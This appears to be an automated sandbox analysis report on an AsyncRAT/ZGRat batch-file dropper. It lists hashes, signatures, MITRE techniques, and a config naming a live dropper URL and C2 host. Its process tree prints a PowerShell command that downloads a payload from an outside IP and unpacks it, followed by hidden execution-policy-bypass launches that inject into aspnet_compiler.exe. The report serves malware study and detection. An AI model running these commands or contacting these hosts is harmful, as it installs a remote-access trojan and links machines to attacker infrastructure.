asyncrat | c0ecdb5046ff0c85592a794cb42f8acc7d1814892a890f07f4e1a9f3e0e0b2df

Analysis

max time kernel
687s
max time network
692s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2023 17:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.bat
Size

226B
MD5

b34b91cd445ac63caa329c1ae21fc024
SHA1

5fae83ff22c9c5f8e681a69d9c7f405dbfeffb94
SHA256

c0ecdb5046ff0c85592a794cb42f8acc7d1814892a890f07f4e1a9f3e0e0b2df
SHA512

3ec3570670e00580ccb2e188a08cd4d580bef8315fd3063bfff605a9c84a6d32dbac28f5bc70489f008e36b3a41f281e1a7777ca5493186f8e9e9f7e0e7739e6

Score

10^/10

asyncrat zgrat default rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://91.92.242.28:222/jn.jpg

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Default

win009.theworkpc.com:5010

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1080-96-0x0000027E7E400000-0x0000027E7E446000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1912-97-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1080 set thread context of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 4180 set thread context of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 512 set thread context of 2344	512	powershell.exe	aspnet_compiler.exe
PID 3424 set thread context of 4220	3424	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings cmd.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5092	powershell.exe
5092	powershell.exe
3388	powershell.exe
3388	powershell.exe
3388	powershell.exe
1080	powershell.exe
1080	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
4180	powershell.exe
4180	powershell.exe
512	powershell.exe
512	powershell.exe
3424	powershell.exe
3424	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

aspnet_compiler.exe

pid process

1912 aspnet_compiler.exe

pid	process
1912	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	1912	aspnet_compiler.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeWScript.exenet.execmd.exeWScript.exenet.execmd.exepowershell.exeWScript.exenet.execmd.exepowershell.exeWScript.exenet.execmd.exepowershell.exeWScript.exenet.execmd.exepowershell.exe

description	pid	process	target process
PID 1404 wrote to memory of 5092	1404	cmd.exe	powershell.exe
PID 1404 wrote to memory of 5092	1404	cmd.exe	powershell.exe
PID 1404 wrote to memory of 2608	1404	cmd.exe	WScript.exe
PID 1404 wrote to memory of 2608	1404	cmd.exe	WScript.exe
PID 2608 wrote to memory of 3080	2608	WScript.exe	net.exe
PID 2608 wrote to memory of 3080	2608	WScript.exe	net.exe
PID 3080 wrote to memory of 768	3080	net.exe	net1.exe
PID 3080 wrote to memory of 768	3080	net.exe	net1.exe
PID 2608 wrote to memory of 1380	2608	WScript.exe	cmd.exe
PID 2608 wrote to memory of 1380	2608	WScript.exe	cmd.exe
PID 1380 wrote to memory of 3388	1380	cmd.exe	powershell.exe
PID 1380 wrote to memory of 3388	1380	cmd.exe	powershell.exe
PID 3448 wrote to memory of 4980	3448	WScript.exe	net.exe
PID 3448 wrote to memory of 4980	3448	WScript.exe	net.exe
PID 4980 wrote to memory of 3460	4980	net.exe	net1.exe
PID 4980 wrote to memory of 3460	4980	net.exe	net1.exe
PID 3448 wrote to memory of 3292	3448	WScript.exe	cmd.exe
PID 3448 wrote to memory of 3292	3448	WScript.exe	cmd.exe
PID 3292 wrote to memory of 1080	3292	cmd.exe	powershell.exe
PID 3292 wrote to memory of 1080	3292	cmd.exe	powershell.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1080 wrote to memory of 1912	1080	powershell.exe	aspnet_compiler.exe
PID 1808 wrote to memory of 1048	1808	WScript.exe	net.exe
PID 1808 wrote to memory of 1048	1808	WScript.exe	net.exe
PID 1048 wrote to memory of 2028	1048	net.exe	net1.exe
PID 1048 wrote to memory of 2028	1048	net.exe	net1.exe
PID 1808 wrote to memory of 404	1808	WScript.exe	cmd.exe
PID 1808 wrote to memory of 404	1808	WScript.exe	cmd.exe
PID 404 wrote to memory of 1160	404	cmd.exe	powershell.exe
PID 404 wrote to memory of 1160	404	cmd.exe	powershell.exe
PID 1160 wrote to memory of 4596	1160	powershell.exe	aspnet_compiler.exe
PID 1160 wrote to memory of 4596	1160	powershell.exe	aspnet_compiler.exe
PID 1160 wrote to memory of 4596	1160	powershell.exe	aspnet_compiler.exe
PID 1172 wrote to memory of 3268	1172	WScript.exe	net.exe
PID 1172 wrote to memory of 3268	1172	WScript.exe	net.exe
PID 3268 wrote to memory of 2496	3268	net.exe	net1.exe
PID 3268 wrote to memory of 2496	3268	net.exe	net1.exe
PID 1172 wrote to memory of 320	1172	WScript.exe	cmd.exe
PID 1172 wrote to memory of 320	1172	WScript.exe	cmd.exe
PID 320 wrote to memory of 4180	320	cmd.exe	powershell.exe
PID 320 wrote to memory of 4180	320	cmd.exe	powershell.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 4180 wrote to memory of 4416	4180	powershell.exe	aspnet_compiler.exe
PID 228 wrote to memory of 4448	228	WScript.exe	net.exe
PID 228 wrote to memory of 4448	228	WScript.exe	net.exe
PID 4448 wrote to memory of 792	4448	net.exe	net1.exe
PID 4448 wrote to memory of 792	4448	net.exe	net1.exe
PID 228 wrote to memory of 1256	228	WScript.exe	cmd.exe
PID 228 wrote to memory of 1256	228	WScript.exe	cmd.exe
PID 1256 wrote to memory of 512	1256	cmd.exe	powershell.exe
PID 1256 wrote to memory of 512	1256	cmd.exe	powershell.exe
PID 512 wrote to memory of 2344	512	powershell.exe	aspnet_compiler.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\file.bat"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe Start-BitsTransfer -Source 'http://91.92.242.28:222/jn.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\f1.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\f1.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\f1.ps1'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3388

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\tron.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3448
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\tron.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\tron.ps1'"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:1912

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\tron.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\tron.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\tron.ps1'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4596

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\tron.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\tron.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\tron.ps1'"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4416

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\tron.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:228
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\tron.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\tron.ps1'"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:512
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:2344

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\tron.vbs"
1⤵
- Checks computer location settings
PID:4264
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  PID:1916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\tron.bat" "
  2⤵
  PID:2408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\tron.ps1'"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e5ab5d093e49058a43f45f317b401e68

SHA1
120da069a87aa9507d2b66c07e368753d3061c2d

SHA256
4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

SHA512
d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bc7831aac9ac3335851531fd399913d1

SHA1
41245dc8ebb00a00926d2a94dede55074c009023

SHA256
56c36010fc9c9a2964242f484fd62170042a1d9f6de070cd821fad3553a54ea1

SHA512
4ffcf1b7b293f77b38c91832f6c369d50a1af13bccec6805f537b87e4b20ebb4da5a47a4412b9d46414e819c65ba4bf23723e2cf0a3caf0e9137615c500ab87f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73cd249332f44480c028cb93b34c70ea

SHA1
4f09c02dd6d338bd72a3c67e280aae86df5aee59

SHA256
ea5257dee09d52232127eaac58532f6ce6987fb2d38089adead5363662bb0f65

SHA512
51faf5f1d9e18a90fff885452d5321aee000fee882be195d9dc180b47d3d10fc57193fb7ec7ff955977114b51692b1a418ae4cf53ce6ebc8b1543ee646f96956

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
21ce766ebba46034d1871b34a97cd0fe

SHA1
d22eeef76a25b13f8ed5c63cc11c5f6134502366

SHA256
c7dd6a5dbe190d36b4c284ad2352b2972d764a6885b1609b3d72f53423311155

SHA512
fcee12dce3f63d397e81a4ff4bcfaf5800c34de0de666b2385c82e1b9e41afbd42d7210d774d0667d57bcecf1e0866eaf573b6a74ed01fa243af144d694c4742

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2ec012eb234e53941c1777a4b5af0f81

SHA1
db47e7fc7408d870c872703488da3091cf57e1f1

SHA256
29e10dd31971fbbbe8ecafa6db38132349aa761f19ae64b133ac483b10dac3b6

SHA512
b9e09f4d1a4024bf7eb6009f7a01ed120dbfd95d51e1e852414d3b05f60d570496789d1df0738b0d0141a1ff74d14048f66cc4cb1a3e55cae5b00cf8d6fd5d25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
2KB

MD5
a2226dbd44987aa6250391f0cd68ffc7

SHA1
3b9c9c41718c550ac81f954065fcdfe54b8e499f

SHA256
1a0047e9e7d0431233d9f83f5e6d8100fcf300e5560b27bb853201cee49e595b

SHA512
7352e385369c380d6b369753ed1c90b1afd6a29245793525d941f06b52893f8d8006bd5dfc6f1ec785cd6d0bdf411126de45aff215018014c6c93197d3ff7c8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
54cc2df3eaeefd28f1b592c97149be02

SHA1
7ff3ebc5c81a97df990fad189af95a42b4fedaa1

SHA256
542f6d0400d6466ff4df625d485a47d5967850d176b0670fa1a943ae5ef854c1

SHA512
bfd3fd9b8b07c6f72ea56f2deb75de18988803a61af346a899bc315a9e32df3a7d0bf3221b20277257956b2174ed0312cd0a2068cbca701a939c36b55f056266

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwqanig5.4te.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Execute.txt

Filesize
56B

MD5
529cf04db0f736467c7583ea80c3aa66

SHA1
7628148337b1d3d700c8151f76a1595b6f5123b8

SHA256
67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

SHA512
f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

Download Submit
C:\Users\Public\Framework.txt

Filesize
520B

MD5
6a08392ecf95df7fc91917dcfaae8da6

SHA1
480f6a5c761e1a069c0d68f5ac2aabf727791393

SHA256
0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

SHA512
d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

Download Submit
C:\Users\Public\f1.bat

Filesize
236B

MD5
70f2eb771cb0d64b6cf1740b9c31023e

SHA1
78d7b2b3b95d6f051f99c9b037805a9ea8d83f22

SHA256
4ae9de22dc0f88ed3af80cb1a1fef524336fc3d5ef4006c728bd8a0ea619eac1

SHA512
0f468f990cf512ea65174aa8d6a3eaa13f3ede72d56bb263f7628f1228d4215a86b1d559e701c215cca6075a6ae640f97ec48a34b891db7029408deaf9174b3f

Download Submit
C:\Users\Public\f1.ps1

Filesize
519B

MD5
2792d4094b1a339d357f1cbc7afa6b27

SHA1
3bbe18d2aad738fab9c3a3ed66d364584956580d

SHA256
85dcbc223aa66389c886357f3c69a1b1363490be120242018acf04c3a9571bc2

SHA512
cf3c2916502a0efc8e96be79e3530bd1935790cdde308b513cdecc287c282872349b6b2298cd19a0cf0a028b8ac2ee5e75dd450e90a120e86e40b6c45505a722

Download Submit
C:\Users\Public\f1.vbs

Filesize
4KB

MD5
8f36e29084efb928908860dea602dc62

SHA1
443268129138f8b5be51016f2d5759f36d4b9614

SHA256
c7af82fee213402dead97c8f5e7bad440ed0e105177ca700e7e6f27965377295

SHA512
af433e2550b8adc8ab2288085fc295f7f3e7d6938b97c4272a46ecefc386886f28c15fa07fd66157b640cf0dc8aaee78f727c2a320e28a936d362a1e85bd9ec9

Download Submit
C:\Users\Public\invoke.txt

Filesize
6B

MD5
b9376e9e3c4d48f5e35a3f355ae1f74a

SHA1
c65605adf5270f5065089b0189da542274d30db0

SHA256
90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

SHA512
5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

Download Submit
C:\Users\Public\load.txt

Filesize
4B

MD5
f19dbf2edb3a0bd74b0524d960ff21eb

SHA1
ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

SHA256
8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

SHA512
f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

Download Submit
C:\Users\Public\method.txt

Filesize
9B

MD5
38b97710070dbdd7b3359c0d52da4a72

SHA1
4ce08d2147c514f9c8e1f83d384369ec8986bc3b

SHA256
675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

SHA512
b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

Download Submit
C:\Users\Public\msg.txt

Filesize
248KB

MD5
c863ec2426c04b131b7e76f7d52afbb4

SHA1
4f8063f38044c4d6378f4c00fc9e64a205e03360

SHA256
c35c8494bffed1d24182ee1ebf5f89d56e656b7880cfe96274aa29d6891f8df6

SHA512
c22644391844382bb766519af778416f94430995c57937257d40ca67f14f843fe6d1ae7b56dc932f402ca4f28a3ad8ba9ddbadd6057b5aad67c8d5d941b9f09a

Download Submit
C:\Users\Public\runpe.txt

Filesize
504KB

MD5
37c7338fc0dee2431f17c13e6d63ca7d

SHA1
5fd56e0b30e804985ec6369cca921aa57c1b9387

SHA256
d7fae721570c9ac29543def534f2b8bcaab602e78bde187855e97ca100abb799

SHA512
1dd9ebc7a7884b5c9d73dae351b3d58a82588f44e5861a358a4510fd80e8613719cef5ab2affe5d256eac697e359a7f2c952f89aea94b93692113da78876e8fe

Download Submit
C:\Users\Public\tron.bat

Filesize
238B

MD5
d80b4680479b68de8de994d27ae262f0

SHA1
a30bf80fa28ffe4f809ecc0fa356e9636edc58dd

SHA256
f9bf3f740f1d0a2fc7aeede7df9a835b4b2aa89e1a76b0d7bc1cc3f48e4fa39a

SHA512
5f5b7c0287cc8bee5c49875473a23375c4f82eb78ef26766986088a67ce737931d0f9167b6c6e86237fcc9fdf40907e7f512f0c1c76ac706de99469aada3f5e2

Download Submit
C:\Users\Public\tron.ps1

Filesize
1KB

MD5
400c268a729be4f5a6da4e530207f753

SHA1
797589769b3d513c3ca42bf7e03cd6a2e60a9375

SHA256
1868e117fda0853d47dd6613b499633fa9f00b088f913776065b1d151dba67c9

SHA512
756279b57d0b7b127a41ace6730ce813a1150b3162710161dd78c91fa900014db7e4b7a346c6668adb2621d4c3d7ada00255cc5c31834a4c9ae6a5335d262e2d

Download Submit
C:\Users\Public\tron.vbs

Filesize
2KB

MD5
fafa6384d6308f240b05fb978ae3255a

SHA1
00b64db9c057bbd3e47d9da376eb1a53d4e1b44b

SHA256
66d269cf2d377a38abf3be2f529025c9f75df322a4ae2d8539c29bfc49077e3f

SHA512
9e781349b10f18174a603f7076fe423161c64f8382ea55bf62ad1050a543c0f2ec6283c254f45755e14c1d6fe78bcdad4320d31df9c5e67516ebca1f90b80af7

Download Submit
C:\Users\Public\type.txt

Filesize
7B

MD5
be784e48d0174367297b636456c7bcf1

SHA1
8c906d9e0e2439238b3263e087aee3d98fa86dea

SHA256
510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

SHA512
aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

Download Submit
C:\Users\Public\xx.txt

Filesize
72B

MD5
14c2a6b7bf15e15d8dae9cd4a56432d5

SHA1
0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

SHA256
79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

SHA512
e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

Download Submit
memory/512-154-0x000001E2FC9E0000-0x000001E2FC9F0000-memory.dmp

Filesize
64KB

Download
memory/512-153-0x000001E2FC9E0000-0x000001E2FC9F0000-memory.dmp

Filesize
64KB

Download
memory/512-142-0x00007FF8E2100000-0x00007FF8E2BC1000-memory.dmp

Filesize
10.8MB

Download
memory/512-155-0x000001E2FC9E0000-0x000001E2FC9F0000-memory.dmp

Filesize
64KB

Download
memory/512-160-0x00007FF8E2100000-0x00007FF8E2BC1000-memory.dmp

Filesize
10.8MB

Download
memory/1080-74-0x0000027E7D910000-0x0000027E7D920000-memory.dmp

Filesize
64KB

Download
memory/1080-75-0x0000027E7D910000-0x0000027E7D920000-memory.dmp

Filesize
64KB

Download
memory/1080-73-0x00007FF8E2100000-0x00007FF8E2BC1000-memory.dmp

Filesize
10.8MB

Download
memory/1080-99-0x00007FF8E2100000-0x00007FF8E2BC1000-memory.dmp

Filesize
10.8MB

Download
memory/1080-96-0x0000027E7E400000-0x0000027E7E446000-memory.dmp

Filesize
280KB

Download
memory/1160-107-0x00007FF8E1EE0000-0x00007FF8E29A1000-memory.dmp

Filesize
10.8MB

Download
memory/1160-108-0x000001A0B9290000-0x000001A0B92A0000-memory.dmp

Filesize
64KB

Download
